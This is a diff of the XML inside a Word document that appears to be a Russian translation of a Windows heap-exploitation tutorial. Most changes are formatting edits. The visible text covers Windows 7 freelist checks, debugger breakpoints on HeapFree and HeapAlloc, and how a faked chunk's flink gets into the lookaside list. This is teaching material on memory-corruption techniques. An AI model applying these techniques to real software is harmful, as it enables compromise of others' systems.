--- a/103.docx
+++ b/103.docx
@@ -9,15 +9,13 @@
         <w:jc w:val="left"/>
         <w:rPr/>
       </w:pPr>
-      <w:hyperlink r:id="rId3">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
-            <w:highlight w:val="yellow"/>
-          </w:rPr>
-          <w:t>https://www.fuzzysecurity.com/tutorials/mr_me/4.html</w:t>
-        </w:r>
-      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="InternetLink"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>https://www.fuzzysecurity.com/tutorials/mr_me/4.html</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -338,21 +336,7 @@
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t>Вставка в</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-        </w:rPr>
-        <w:t>о</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> freelist[0]</w:t>
+        <w:t>Вставка во freelist[0]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -391,32 +375,24 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">Чтобы исправить эту проблему в Windows 7 программисты Microsoft добавили проверку, похожую на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">следующий </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>сниппет псевдокода:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:t>Чтобы исправить эту проблему в Windows 7 программисты Microsoft добавили проверку, похожую на следующий сниппет псевдокода:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -429,7 +405,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -480,7 +456,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -493,7 +469,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -510,7 +486,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -527,7 +503,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -544,7 +520,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -557,7 +533,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -570,7 +546,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -583,7 +559,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -596,7 +572,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -609,7 +585,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -622,7 +598,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -639,7 +615,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -656,7 +632,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -669,7 +645,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -686,7 +662,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -703,7 +679,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -720,7 +696,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -737,7 +713,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -750,7 +726,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -767,7 +743,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -784,7 +760,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -797,7 +773,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -814,7 +790,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -831,7 +807,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -844,7 +820,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -861,7 +837,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -878,7 +854,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -891,7 +867,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -908,7 +884,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -925,7 +901,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -942,7 +918,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -955,7 +931,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -972,7 +948,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -985,7 +961,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1002,7 +978,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1019,7 +995,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1036,7 +1012,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1053,7 +1029,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1070,7 +1046,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1083,7 +1059,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1100,7 +1076,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1117,7 +1093,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1130,7 +1106,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1147,7 +1123,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1164,7 +1140,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1181,7 +1157,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1198,7 +1174,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1215,7 +1191,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1232,7 +1208,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1245,7 +1221,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1262,7 +1238,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1279,7 +1255,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1292,7 +1268,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1309,7 +1285,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1326,7 +1302,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1343,7 +1319,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1356,7 +1332,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1373,7 +1349,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1390,7 +1366,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1407,7 +1383,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="EEEEEE" w:val="clear"/>
+        <w:shd w:val="clear" w:fill="EEEEEE"/>
         <w:bidi w:val="0"/>
         <w:jc w:val="left"/>
         <w:rPr/>
@@ -1437,7 +1413,45 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Несмотря на то что этот код, разумеется, не является примером из реального мира, его задача продемонстрировать технику, которая, будучи усвоенной, может быть использована позже с какой-либо программой.</w:t>
+        <w:t>Несмотря на то что этот код не является примером из реального мира, его задача продемонстрировать технику, котор</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>ую</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">можно </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>использова</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">ть </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>позже с какой-либо программой.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1475,7 +1489,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId2"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1528,26 +1542,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">Спускайтесь ниже, пока не увидите вызовы API из main: HeapCreate, HeapAlloc, HeapFree. Установите точку останова на втором HeapFree и </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>по</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>следующих HeapAlloc'ах.</w:t>
+        <w:t>Спускайтесь ниже, пока не увидите вызовы API из main: HeapCreate, HeapAlloc, HeapFree. Установите точку останова на втором HeapFree и последующих HeapAlloc'ах.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1585,7 +1580,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId3"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1664,7 +1659,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId4"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1766,7 +1761,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId5"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1845,7 +1840,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId6"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1924,7 +1919,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1954,7 +1949,29 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Ту же информацию можно представить визуально командой !heaper ab 490000 -g. Она создаст картинку с изображением графа и сохранит её в 'C:\Program Files\Immunity Inc\Immunity Debugger\' (имя картинки по умолчанию 'freelist_graph.png').</w:t>
+        <w:t>Ту же информацию можно представить визуально командой !heaper ab 490000 -g. Она создаст картинку с изображением графа и сохранит её в 'C:\Program Files\Immunity Inc\Immunity Debugger\' (по умолчанию имя картинки 'freelist_graph.png').</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -2003,7 +2020,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2022,6 +2039,17 @@
             </a:graphic>
           </wp:anchor>
         </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -2082,7 +2110,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId9"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2161,7 +2189,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2193,28 +2221,21 @@
         <w:rPr/>
         <w:t>Отлично, а сейчас важный момент. Когда мы сделаем один шаг отладчиком после вызова HeapFree, мы заметим серьёзные изменения. В lookaside[3] появятся 3 элемента, а наш flink станет flink'ом подделанного чанка в lookaside. Использовав '!heaper af [heap]' или '!heaper analysefrontend [heap]', вы увидите следующее:</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>0</wp:posOffset>
@@ -2224,7 +2245,7 @@
             </wp:positionV>
             <wp:extent cx="6332220" cy="2350770"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
+            <wp:wrapTopAndBottom/>
             <wp:docPr id="10" name="Image10" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -2239,7 +2260,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2259,6 +2280,14 @@
           </wp:anchor>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
